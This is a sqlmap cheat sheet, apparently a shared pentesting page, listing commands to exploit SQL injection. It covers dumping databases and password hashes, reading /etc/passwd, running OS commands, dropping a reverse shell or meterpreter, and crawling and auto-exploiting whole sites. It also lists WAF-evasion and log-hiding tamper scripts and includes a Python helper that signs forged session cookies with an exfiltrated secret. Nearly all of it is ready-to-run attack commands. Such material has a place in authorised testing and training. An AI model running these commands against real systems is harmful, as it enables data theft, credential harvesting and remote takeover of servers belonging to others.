Sqlmap Advanced

This document provides information on how to use the SQLmap tool to test for and exploit SQL injection vulnerabilities. It lists common SQLmap commands and parameters for tasks such as retrieving information from the database, dumping database contents, executing operating system commands via SQL injection, and automating the scanning of a website for SQL injection vulnerabilities. The document also provides tips on customizing SQL injection payloads using techniques like prefixing, suffixing, and tampering strings.

Uploaded by Barik Ghofur
Basic arguments for SQLmap

Generic

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only the UNION and boolean-based blind techniques, in that order (default "BEUSTQ")
--batch #Non-interactive mode; sqlmap normally asks questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify UNION SQLi with an unusual union char instead of the default NULL

Retrieve Information

Internal

--current-user #Get current user
--is-dba #Check if current user is DBA (administrator)
--hostname #Get hostname
--users #Get usernames of DB
--passwords #Get password hashes of DB users
--privileges #Get privileges

DB data

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
--dump -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump only the given column(s)

Injection place

From Burp/ZAP capture

Capture the request and save it to a req.txt file

sqlmap -r req.txt --current-user

GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in Headers and other HTTP Methods

#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'

Indicate string when injection is successful

--string="string_shown_when_TRUE" #String that appears in the response only when the injected condition is TRUE (boolean-based blind)

Eval

sqlmap allows using -e or --eval to process each payload with a Python one-liner before sending it. This makes it easy and fast to transform the payload in custom ways (re-signing, re-encoding, recomputing a checksum) before the request goes out. In the following example the Flask session cookie is signed with the known secret before sending it:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
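As an added example (not part of the original page, and using only the standard library rather than flask_unsign), the following shows what an --eval hook actually does: sqlmap binds each request parameter to a variable of the same name, runs the snippet, and sends whatever the variable holds afterwards. The cookie format (urlsafe-base64 JSON body, a dot, HMAC-SHA256 hex tag), the secret and the module name evalhook are hypothetical; a real target's signing scheme has to be reproduced exactly.

```python
# Added example, not from the page: stdlib stand-in for the flask_unsign trick above.
# The cookie format, SECRET and module name are hypothetical.
import base64
import hashlib
import hmac
import json

SECRET = "SecretExfiltratedFromTheMachine"   # assumed known, as in the page's example


def sign_cookie(uid_value, secret=SECRET):
    """Build a signed cookie whose 'uid' claim holds the (payload-bearing) value."""
    body = base64.urlsafe_b64encode(
        json.dumps({"uid": uid_value}).encode()).decode().rstrip("=")
    tag = hmac.new(secret.encode(), body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag


def verify_cookie(cookie, secret=SECRET):
    """What the (hypothetical) server does: check the tag, then decode the claims.
    Returns None on a bad tag, which is why an unsigned payload never reaches the query."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret.encode(), body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    padded = body + "=" * (-len(body) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


# The one-liner you would pass to --eval. sqlmap binds every request parameter
# (here the 'session' cookie, already carrying the payload inserted at the '*'
# marker) to a variable of the same name, runs the code, and sends the value the
# variable holds afterwards.
EVAL_CODE = "session = sign_cookie(session)"


def run_eval_hook(code, params):
    """Reproduce that binding locally so the hook can be checked before running sqlmap."""
    scope = dict(params)
    exec(code, {"sign_cookie": sign_cookie}, scope)
    return {name: scope[name] for name in params}


# Full command, assuming this file is saved as evalhook.py and is importable
# (e.g. on PYTHONPATH) when sqlmap runs:
#   sqlmap -u "http://1.1.1.1/sqli" --cookie="session=*" --dump \
#     --eval "from evalhook import sign_cookie; session = sign_cookie(session)"
```

Keep the helper in a module rather than inlining the HMAC logic into the --eval string; the one-liner is evaluated once per request, and a mistake there silently produces cookies the server rejects, which sqlmap will report as "parameter does not seem to be injectable".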

Shell

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
#OS takeover needs a privileged DB user (e.g. FILE privilege on MySQL, xp_cmdshell on MSSQL) plus stacked queries or a writable directory; check --is-dba and --privileges first

Read File

--file-read=/etc/passwd

Crawl a website with SQLmap and auto-exploit


sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non-interactive mode; sqlmap normally asks questions, this accepts the default answers
--crawl = how deep to crawl the site
--forms = parse and test forms

Second Order Injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3

sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
#--second-order points at the page where the result of the injected query is later displayed
Read this post about how to perform simple and complex second order injections with sqlmap.

Labs to practice

Learn about sqlmap by using it in the THM room: TryHackMe | SQLMAP

Customizing Injection
Set a suffix

python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "

Prefix

python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "

Help finding boolean injection

# --not-string "string" gives sqlmap a string that appears only in FALSE responses (the complement of --string, which marks TRUE responses); useful when auto-detection of boolean-based blind injection fails
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

Remember that you can write your own tamper script in Python, and it is very simple. You can find a tamper example in the Second Order Injection page linked here.
--tamper=name_of_the_tamper #Comma-separate several to chain them, e.g. --tamper=space2comment,randomcase
#In Kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper                          Description
apostrophemask.py               Replaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode.py         Replaces apostrophe character with its illegal double unicode counterpart
appendnullbyte.py               Appends encoded NULL byte character at the end of payload
base64encode.py                 Base64 all characters in a given payload
between.py                      Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
bluecoat.py                     Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character = with LIKE operator
chardoubleencode.py             Double url-encodes all characters in a given payload (not processing already encoded)
commalesslimit.py               Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
commalessmid.py                 Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
concat2concatws.py              Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.py                   Url-encodes all characters in a given payload (not processing already encoded)
charunicodeencode.py            Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"
charunicodeescape.py            Unicode-escapes non-encoded characters in a given payload (not processing already encoded). "\u0022"
equaltolike.py                  Replaces all occurrences of operator equal ('=') with operator 'LIKE'
escapequotes.py                 Slash escape quotes (' and ")
greatest.py                     Replaces greater than operator ('>') with 'GREATEST' counterpart
halfversionedmorekeywords.py    Adds versioned MySQL comment before each keyword
ifnull2ifisnull.py              Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
modsecurityversioned.py         Embraces complete query with versioned comment
modsecurityzeroversioned.py     Embraces complete query with zero-versioned comment
multiplespaces.py               Adds multiple spaces around SQL keywords
nonrecursivereplacement.py      Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
percentage.py                   Adds a percentage sign ('%') in front of each character
overlongutf8.py                 Converts all (non-alphanumeric) characters in a given payload to overlong UTF-8 (not processing already encoded)
randomcase.py                   Replaces each keyword character with random case value
randomcomments.py               Adds random comments to SQL keywords
securesphere.py                 Appends special crafted string
sp_password.py                  Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
space2comment.py                Replaces space character (' ') with comments
space2dash.py                   Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
space2hash.py                   Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2morehash.py               Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
space2mssqlblank.py             Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mssqlhash.py              Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
space2mysqlblank.py             Replaces space character (' ') with a random blank character from a valid set of alternate characters
space2mysqldash.py              Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
space2plus.py                   Replaces space character (' ') with plus ('+')
space2randomblank.py            Replaces space character (' ') with a random blank character from a valid set of alternate characters
symboliclogical.py              Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
unionalltounion.py              Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py                Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
uppercase.py                    Replaces each keyword character with upper case value (e.g. insert -> INSERT)
varnish.py                      Appends a HTTP header 'X-originating-IP'
versionedkeywords.py            Encloses each non-function keyword with versioned MySQL comment
versionedmorekeywords.py        Encloses each keyword with versioned MySQL comment
xforwardedfor.py                Appends a fake HTTP header 'X-Forwarded-For'
